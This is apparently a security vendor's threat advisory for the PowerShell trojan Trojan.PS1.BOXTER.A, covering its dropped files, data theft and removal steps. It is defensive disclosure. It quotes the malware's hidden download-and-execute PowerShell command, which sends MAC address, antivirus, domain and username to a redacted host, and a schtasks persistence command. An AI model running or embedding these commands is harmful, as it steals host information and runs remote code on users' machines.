Trojan.PS1.BOXTER.A
Windows
恶意软件类型:
Trojan
有破坏性?:
没有
加密?:
没有
In the Wild:
是的
概要
它以其他恶意软件释放的文件或用户访问恶意网站时不知不觉下载的文件的形式到达系统。
技术详细信息
新病毒详细信息
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
安装
它添加下列进程:
- %System%\getmac.exe /FO CSV
(注意: %System% 是 Windows 的 system 文件夹,通常位于 C:\Windows\System (Windows 98 和 ME)、C:\WINNT\System32 (Windows NT 和 2000) 和 C:\WINDOWS\system32 (Windows 2000(32-bit)、XP、Server 2003(32-bit)、Vista、7、8、8.1、2008(64-bit),2012(64bit) 和 10(64-bit))。)
植入例程
它植入下列文件:
- %User Temp%\ccc.log
- %User Temp%\kkkk.log
(注意: %User Temp% 是当前用户的 Temp 文件夹。通常位于 C:\Documents and Settings\{user name}\Local Settings\Temp (Windows 2000(32-bit)、XP 和 Server 2003(32-bit))、C:\Users\{user name}\AppData\Local\Temp (Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit) 和 10(64-bit)。)
信息窃取
它收集下列数据:
- Mac Address
- installed AV
- OS Version
- OS architecture
- Domain
- Username
- Date
其他详细信息
该程序执行以下操作:
- If Administrator role:
- It connects to the following URL to download component loaded in its memory:
- http://cdn.{BLOCKED}dn.net/p?hig{Date}
- Creates scheduled task:
- Task Name: Winnet
- Trigger: Every 45 minutes
- Task Action: powershell -ep bypass -e {downloaded b64 encoded} /F
- Adds the following process to create a scheduled task:
- schtasks.exe /create /ru system /sc MINUTE /mo 45 /tn Winnet /tr "powershell -ep bypass -e {downloaded b64 encoded}" /F
- If not Administrator role:
- It connects to the following URL to download component loaded in its memory:
- http://cdn.{BLOCKED}dn.net/p?low{Date}
- Creates scheduled task:
- Task Name: Winnet
- Trigger: Every 45 minutes
- Task Action: powershell -ep bypass -e {downloaded b64 encoded} /F
- Adds the following process to create a scheduled task:
- schtasks.exe /create /ru system /sc MINUTE /mo 45 /tn Winnet /tr "powershell -ep bypass -e {downloaded b64 encoded}" /F
- If %UserTemp\%kkkk.log does not exists, it creates the file and terminates powershell processes running on the machine
- It adds the following process if no other instance of the program is running on the machine:
- /c powershell -nop -w hidden -ep bypass -c IEX (New-Object Net.WebClient).downloadstring("http://{BLOCKED}.{BLOCKED}.103.152/updatev1?mac={mac address}av={av}version={OS version}bit={OS architecture}flag2={flag}domain={domain}user={username}PS={exeflag}
解决方案
Step 1
对于Windows ME和XP用户,在扫描前,请确认已禁用系统还原功能,才可全面扫描计算机。
Step 2
请注意,在执行此恶意软件/间谍软件/灰色软件期间,并非所有文件、文件夹、注册表项和条目都安装在您的计算机上。这可能是由于安装不完整或其他操作系统条件造成的。如果找不到相同的文件/文件夹/注册表信息,请继续下一步。
Step 3
搜索和删除这些文件
- %User Temp%\ccc.log
- %User Temp%\kkkk.log
- %User Temp%\ccc.log
- %User Temp%\kkkk.log
Step 4
Deleting Scheduled Tasks
The following {Task Name} - {Task to be run} listed should be used in the steps identified below:
For Windows 2000, Windows XP, and Windows Server 2003:
- Open the Windows Scheduled Tasks. Click Start>Programs>Accessories>
System Tools>Scheduled Tasks. - Locate each {Task Name} values listed above in the Name column.
- Right-click on the said file(s) with the aforementioned value.
- Click on Properties. In the Run field, check for the listed {Task to be run}.
- If the strings match the list above, delete the task.
For Windows Vista, Windows 7, Windows Server 2008, Windows 8, Windows 8.1, and Windows Server 2012:
- Open the Windows Task Scheduler. To do this:
• On Windows Vista, Windows 7, and Windows Server 2008, click Start, type taskschd.msc in the Search input field, then press Enter.
• On Windows 8, Windows 8.1, and Windows Server 2012, right-click on the lower left corner of the screen, click Run, type taskschd.msc, then press Enter. - In the left panel, click Task Scheduler Library.
- In the upper-middle panel, locate each {Task Name} values listed above in the Name column.
- In the lower-middle panel, click the Actions tab. In the Details column, check for the {Task to be run} string.
- If the said string is found, delete the task.
Step 5
使用趋势科技产品扫描计算机,并删除检测到的Trojan.PS1.BOXTER.A文件 如果检测到的文件已被趋势科技产品清除、删除或隔离,则无需采取进一步措施。可以选择直接删除隔离的文件。请参阅知识库页面了解详细信息。